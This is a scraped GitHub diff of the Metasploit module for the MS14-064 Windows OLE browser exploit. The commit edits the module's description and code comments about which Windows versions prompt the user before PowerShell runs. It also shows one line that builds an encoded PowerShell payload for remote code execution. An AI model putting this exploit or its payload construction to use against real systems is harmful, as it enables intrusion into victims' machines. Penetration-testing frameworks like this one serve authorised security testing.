File tree Expand file tree Collapse file tree 1 file changed +4
-6
lines changed
modules/exploits/windows/browser Expand file tree Collapse file tree 1 file changed +4
-6
lines changed Original file line number Diff line number Diff line change 1- ##
1+ /ms14_064_ole_code_execution.rb ##
22# This module requires Metasploit: http:/ /metasploit . com /download
33# Current source: https://github.com/rapid7/metasploit-framework
44##
@@ -23,9 +23,7 @@ def initialize(info={})
2323 Windows 10, and there is no patch for Windows XP or older.
2424
2525 Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
26- Windows systems, the exploit will try using Powershell instead. If Protected Mode is
27- enabled, the user has to manually allow powershell.exe to execute in order to be
28- compromised.
26+ newer Windows systems, the exploit will try using Powershell instead.
2927 } ,
3028 'License' => MSF_LICENSE ,
3129 'Author' =>
@@ -327,8 +325,8 @@ def powershell_vector(prep)
327325 end
328326
329327 # Powershell was the first technique demonstrated publicly.
330- # On some Windows setups such as Windows 7 + IE 8 , this works quite well.
331- # But you will get a prompt for IE9 or newer .
328+ # On some Windows setups such as Windows 7 without a service pack , this works quite well.
329+ # But other Windows setups you will get a prompt.
332330 payl = cmd_psh_payload ( payload . encoded , "x86" , { :remove_comspec => true } )
333331 payl . slice! "powershell.exe "
334332
You can’t perform that action at this time.
0 commit comments